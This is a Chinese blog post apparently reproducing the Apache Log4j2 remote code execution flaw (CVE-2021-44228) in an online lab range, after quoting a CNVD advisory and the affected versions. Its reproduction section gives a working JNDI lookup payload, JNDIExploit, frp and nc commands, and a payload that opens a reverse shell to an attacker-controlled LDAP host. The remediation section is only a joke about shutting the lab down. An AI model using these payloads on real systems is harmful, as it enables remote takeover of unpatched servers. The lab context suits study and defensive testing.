[漏洞复现]Apache_log4j2(CVE-2021-44228)

安全公告编号:CNTA-2021-0032

2021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞(CNVD-2021-95914)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本,同时采取防范性措施避免漏洞攻击威胁。

一、漏洞情况分析

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。

2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

CNVD对该漏洞的综合评级为“高危”。

二、漏洞影响范围

漏洞影响的产品版本包括:

Apache Log4j2 2.0 - 2.15.0-rc1

三、漏洞复现

春秋云境.com一键梭哈

开启场景“启动原神”

DNSLog验证  payload:

${jndi:ldap://xxx.dnslog.cn}

DNSLog网站成功收到

JNDI注入反弹shell,准备工具:

1、JNDIExploit

2、frp

3、nc

查看使用参数

java -jar JNDIExploit-1.4-SNAPSHOT.jar -h

查看模块

java -jar JNDIExploit-1.4-SNAPSHOT.jar -u

使用该模块构造payload

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip

JNDIExploit开起来

frp开起来

nc开起来

根据我们的ip,port构造payload

${jndi:ldap://ip:1389/Basic/ReverseShell/ip/port}

gogogo

直接拿下

四、漏洞处置建议

把靶场关了

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-11 14:38:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-11 14:38:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-11 14:38:02       82 阅读
  4. Python语言-面向对象

    2024-01-11 14:38:02       91 阅读

热门阅读

  1. 概率生成函数([CTSC2006] 歌唱王国 题解)

    2024-01-11 14:38:02       54 阅读
  2. GO项目自动化-根据库表字段自动生成API

    2024-01-11 14:38:02       51 阅读
  3. 源码编译FFmpeg4.3

    2024-01-11 14:38:02       56 阅读
  4. 【我的Rust库】get_local_info 0.1.7发布

    2024-01-11 14:38:02       47 阅读
  5. Opentsdb官方优化文档 - 翻译

    2024-01-11 14:38:02       42 阅读
  6. Android 车联网——CarOccupantZoneService介绍(十四)

    2024-01-11 14:38:02       53 阅读
  7. resulttype和parametertype的区别

    2024-01-11 14:38:02       55 阅读
  8. Vuex与Vuex-Class的底层原理简单实现

    2024-01-11 14:38:02       56 阅读
  9. leetcode面试经典150题——49 字母异位词分组

    2024-01-11 14:38:02       56 阅读
  10. 【机器学习300问】2、机器学习分为哪几类?

    2024-01-11 14:38:02       44 阅读
  11. 秒杀相关问题及答案(2024)

    2024-01-11 14:38:02       43 阅读
  12. 12.2 队列模拟

    2024-01-11 14:38:02       77 阅读
  13. Linux搭建Kafka详细一步一步指南(linux启动kafka脚本)

    2024-01-11 14:38:02       53 阅读
  14. 鸿蒙OS应用开发之百分比显示组件

    2024-01-11 14:38:02       49 阅读
  15. PostgreSQL字符串分割函数大全

    2024-01-11 14:38:02       45 阅读